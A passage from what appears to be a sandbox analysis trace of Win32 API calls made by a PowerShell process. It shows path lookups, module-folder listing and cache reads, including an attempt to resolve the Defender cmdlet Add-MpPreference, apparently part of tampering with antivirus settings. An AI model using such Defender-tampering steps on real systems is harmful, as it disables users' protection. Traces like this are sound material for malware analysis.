lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x36 [0331.915] FindFirstFileW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps\\Add-MpPreference.*" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windowsapps\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.921] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b62e470, nSize=0xf1 | out: lpBuffer="") returned 0x94 [0331.926] GetFileAttributesW (lpFileName="C:\\Users\\OqXZRaykm\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\oqxzraykm\\documents\\windowspowershell\\modules")) returned 0xffffffff [0331.937] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0331.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0331.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0331.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0331.946] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25a8cb98, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a440 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25a8cb98, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25ab2de7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="")) returned 1 [0331.947] FindNextFileW (in: hFindFile=0x1a89a440, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0331.947] FindClose (in: hFindFile=0x1a89a440 | out: hFindFile=0x1a89a440) returned 1 [0331.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0331.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0331.949] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0331.949] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0331.949] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0331.949] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0331.950] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0331.950] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0331.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0331.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0331.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0331.951] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25ab2de7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0331.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0331.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0331.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0331.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0331.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0331.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0331.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0331.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0331.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0331.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0331.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0331.953] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0331.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0331.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0331.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0331.953] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0331.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0331.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0331.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0331.954] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25ab2de7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899cc0 [0331.954] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25ab2de7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0331.956] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xb914059, ftLastAccessTime.dwHighDateTime=0x1d5ace1, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="")) returned 1 [0331.957] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0331.957] FindClose (in: hFindFile=0x1a899cc0 | out: hFindFile=0x1a899cc0) returned 1 [0331.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0331.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0331.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0331.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0331.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3d8) returned 1 [0331.957] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62e700 | out: lpFileInformation=0x1b62e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ddb9fba, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19928ea3, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2ddb9fba, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0331.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e388) returned 1 [0331.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0331.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0331.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0331.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0331.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0331.961] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x238e258 | out: lpFileInformation=0x238e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ddb9fba, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19928ea3, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2ddb9fba, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0331.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0331.967] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x1b62c580, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0331.968] CoTaskMemAlloc (cb=0x20c) returned 0x1a8674a0 [0331.968] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a8674a0 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Local") returned 0x0 [0331.968] CoTaskMemFree (pv=0x1a8674a0) [0331.968] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0331.968] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0331.968] GetFileAttributesW (lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x20 [0331.969] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0331.969] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0331.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d568) returned 1 [0331.970] CreateFileW (lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x794 [0331.970] GetFileType (hFile=0x794) returned 0x1 [0331.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d4d8) returned 1 [0331.970] GetFileType (hFile=0x794) returned 0x1 [0331.970] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5c8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5c8*=0x1000, lpOverlapped=0x0) returned 1 [0331.980] ReadFile (in: hFile=0x794, lpBuffer=0x238f31c, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31c*, lpNumberOfBytesRead=0x1b62d5d8*=0xc, lpOverlapped=0x0) returned 1 [0331.981] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0331.987] ReadFile (in: hFile=0x794, lpBuffer=0x238f31e, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31e*, lpNumberOfBytesRead=0x1b62d5d8*=0x9, lpOverlapped=0x0) returned 1 [0331.987] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0331.989] ReadFile (in: hFile=0x794, lpBuffer=0x238f326, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f326*, lpNumberOfBytesRead=0x1b62d5d8*=0xb, lpOverlapped=0x0) returned 1 [0331.989] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0331.995] ReadFile (in: hFile=0x794, lpBuffer=0x238f31a, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31a*, lpNumberOfBytesRead=0x1b62d5d8*=0x2, lpOverlapped=0x0) returned 1 [0331.995] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d598, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d598*=0x1000, lpOverlapped=0x0) returned 1 